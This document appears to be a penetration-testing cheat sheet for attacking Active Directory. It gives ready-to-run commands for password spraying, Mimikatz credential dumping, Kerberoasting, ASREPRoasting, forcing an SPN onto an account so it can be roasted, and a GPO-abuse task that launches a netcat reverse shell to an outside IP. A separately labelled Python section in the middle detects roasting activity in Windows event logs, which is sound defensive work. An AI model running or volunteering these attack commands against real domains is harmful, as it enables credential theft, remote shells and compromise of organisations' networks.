Hooper Labs

Active Directory

Dump Domain (ldapdomaindump)

	ldapdomaindump ldap://<domain> -u 'DOMAIN\user' -p 'password'

Dump Users (nmap)

	nmap -p 389 --script ldap-search --script-args 'ldap.username="cn=myUser,cn=users,dc=myDomain,dc=local",ldap.password=P@ssw0rd,ldap.qfilter=users,ldap.attrib=sAMAccountName' myDomain.local

Return list of users

	cat domain_users.grep | awk '{print $1}' > users.txt

Return list of computers + IPs

	cat domain_computers.grep | awk '{print $3}' | grep -v dNS | xargs dig a @192.168.105.10 | grep kortana.local | grep -v '^;' | awk '{print $5"-"$1}' | cut -d '.' -f1-4 | tr '[:lower:]' '[:upper:]'

mkdir in a loop

	for dir in $(cat domain_computers.grep | awk '{print $3}' | grep -v dNS | xargs dig a @192.168.105.10 | grep kortana.local | grep -v '^;' | awk '{print $5"-"$1}' | cut -d '.' -f1-4 | tr '[:lower:]' '[:upper:]'); do mkdir -p ~/"$dir"; done

Password Spraying

Password Spraying (CrackMapExec)

	crackmapexec smb -u /path/to/users.txt -p /path/to/passwords.txt 192.168.0.0/24


Create Immediate GPO Task

	SharpGPOAbuse.exe --AddComputerTask --TaskName "New Task" --Author "DOMAIN\user" --Command "cmd.exe" --Arguments "/c C:\Temp\nc.exe -v 192.168.99.21 443 -e cmd"  --GPOName Name-of-GPO

Spray with Local Administrator Password (CrackMapExec)

	crackmapexec smb 192.168.0.0/24 -u Administrator --local-auth -H <NTLM:hash>

Remote Desktop

	xfreerdp /u:DOMAIN\user /p:<pass> /v:<ip>

Rubeus (get TGT and apply to new process)

	Rubeus.exe asktgt /user:<user> /rc4:<NTLM hash> /createnetonly:cmd.exe /show /domain:<domain> /dc:<dc-ip>

Mimikatz programmatically dump passwords

	mimikatz.exe "privilege::debug" "log .\logs\Result.txt" "sekurlsa::logonPasswords" "token::elevate" "lsadump::sam" exit

Kerberoast

Find Service Accounts (PowerView)

	Get-NetUser -SPN

Find Service Accounts (PowerShell)

	Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName

Find Service Accounts (Impacket)

	python GetUserSPNs.py domain.local/domainUser:abc123 -outputfile outfile.txt

Do Kerberoasting (PowerView)

	Invoke-Kerberoast

ASREPRoast

ASREPRoast (PowerView)

	Get-DomainUser -PreauthNotRequired -Verbose

ASREPRoast (PowerShell)

	Get-ADUser -Filter {DoesNotRequirePreAuth -eq $True} -Properties DoesNotRequirePreAuth

Do ASREPRoasting, targeted user

	Get-ASREPHash -UserName myUser -Verbose

Do ASREPRoasting, all users

	Invoke-ASREPRoast -Verbose

Do ASREPRoasting (Rubeus)

	.\Rubeus.exe asreproast /outfile:outfile.txt

Do ASREPRoasting (Impacket)

	python GetNPUsers.py domain.local/ -usersfile users.txt -outputfile outfile.txt
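The Kerberoast and ASREPRoast entries above are what the attack side types; on the domain controller both leave a distinctive trace in the Security log. The following is an added example, not part of the Hooper Labs notes, showing the detection logic a defender would run over those events: 4769 service-ticket requests with RC4 (0x17) for many distinct non-computer service accounts from one source (Kerberoasting), and 4768 TGT requests with PreAuthType 0 and RC4 (AS-REP roasting of a DoesNotRequirePreAuth account). The field names match the Security log XML for 4768/4769 (EventID, TargetUserName, ServiceName, TicketEncryptionType, PreAuthType, IpAddress); the events themselves are constructed samples, and the `spn_threshold` knob is an assumption of this example rather than a Windows setting.

```python
"""Offline detector for Kerberoast / AS-REP roast patterns in Windows Security events.

Added example, not code from the original notes. Input is a list of dicts whose keys
follow the Security log field names for events 4768 and 4769. Sample events below
are constructed for the demonstration.
"""

# Encryption type as logged in TicketEncryptionType (hex string in the event XML).
RC4_HMAC = "0x17"
# PreAuthType 0 in a 4768 event: no pre-authentication was performed. A TGT issued
# this way for a user is exactly what an AS-REP roast of that user produces.
NO_PREAUTH = "0"


def is_kerberoast_candidate(ev):
    """4769: RC4 service ticket for a non-computer, non-krbtgt service account."""
    if ev.get("EventID") != 4769:
        return False
    svc = ev.get("ServiceName", "")
    if svc.endswith("$") or svc.lower() == "krbtgt":
        return False  # computer accounts and the KDC itself are noise here
    return ev.get("TicketEncryptionType", "").lower() == RC4_HMAC


def is_asrep_roast_candidate(ev):
    """4768: TGT request with no pre-auth and RC4 (roasting, or a still-misconfigured account)."""
    if ev.get("EventID") != 4768:
        return False
    return (ev.get("PreAuthType") == NO_PREAUTH
            and ev.get("TicketEncryptionType", "").lower() == RC4_HMAC)


def analyse(events, spn_threshold=3):
    """Summarise suspicious ticket activity.

    Returns {"kerberoast": {IpAddress: sorted distinct ServiceNames}, "asrep": [(IpAddress, TargetUserName)]}.
    A source only appears under "kerberoast" once it has requested RC4 tickets for at
    least spn_threshold distinct service accounts (assumed threshold for this example).
    """
    per_source = {}
    for ev in events:
        if is_kerberoast_candidate(ev):
            per_source.setdefault(ev["IpAddress"], set()).add(ev["ServiceName"])
    kerberoast = {ip: sorted(s) for ip, s in per_source.items() if len(s) >= spn_threshold}
    asrep = sorted({(ev["IpAddress"], ev["TargetUserName"])
                    for ev in events if is_asrep_roast_candidate(ev)})
    return {"kerberoast": kerberoast, "asrep": asrep}


# Constructed sample: one host pulling RC4 tickets for several service accounts plus a
# computer account, one legitimate AES (0x12) request, one no-pre-auth TGT for a
# legacy account, and one normal pre-authenticated TGT.
SAMPLE_EVENTS = [
    {"EventID": 4769, "TargetUserName": "alice@CORP.LOCAL", "ServiceName": "svc_sql",
     "TicketEncryptionType": "0x17", "IpAddress": "::ffff:10.0.0.50"},
    {"EventID": 4769, "TargetUserName": "alice@CORP.LOCAL", "ServiceName": "svc_web",
     "TicketEncryptionType": "0x17", "IpAddress": "::ffff:10.0.0.50"},
    {"EventID": 4769, "TargetUserName": "alice@CORP.LOCAL", "ServiceName": "svc_backup",
     "TicketEncryptionType": "0x17", "IpAddress": "::ffff:10.0.0.50"},
    {"EventID": 4769, "TargetUserName": "alice@CORP.LOCAL", "ServiceName": "WS01$",
     "TicketEncryptionType": "0x17", "IpAddress": "::ffff:10.0.0.50"},
    {"EventID": 4769, "TargetUserName": "bob@CORP.LOCAL", "ServiceName": "svc_sql",
     "TicketEncryptionType": "0x12", "IpAddress": "::ffff:10.0.0.77"},
    {"EventID": 4768, "TargetUserName": "legacyapp", "ServiceName": "krbtgt",
     "TicketEncryptionType": "0x17", "PreAuthType": "0", "IpAddress": "::ffff:10.0.0.50"},
    {"EventID": 4768, "TargetUserName": "bob", "ServiceName": "krbtgt",
     "TicketEncryptionType": "0x12", "PreAuthType": "2", "IpAddress": "::ffff:10.0.0.77"},
]

if __name__ == "__main__":
    result = analyse(SAMPLE_EVENTS)
    for ip, spns in result["kerberoast"].items():
        print(f"possible Kerberoast from {ip}: {', '.join(spns)}")
    for ip, user in result["asrep"]:
        print(f"possible AS-REP roast from {ip} for account {user}")
```

Two design points worth noting: filtering out `$`-suffixed service names keeps ordinary computer-to-computer traffic out of the Kerberoast count, and the AS-REP check is useful even without an attacker in the picture, since every hit names an account that still has pre-authentication disabled and should be fixed.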

Force Set SPN (in order to kerberoast an account!)

Set SPN on Account (PowerView)

	Set-DomainObject myUser -Set @{serviceprincipalname='ops/whatever1'}

Set SPN on Account (PowerShell)

	Set-ADUser -Identity <user> -ServicePrincipalNames @{Add='ops/whatever1'}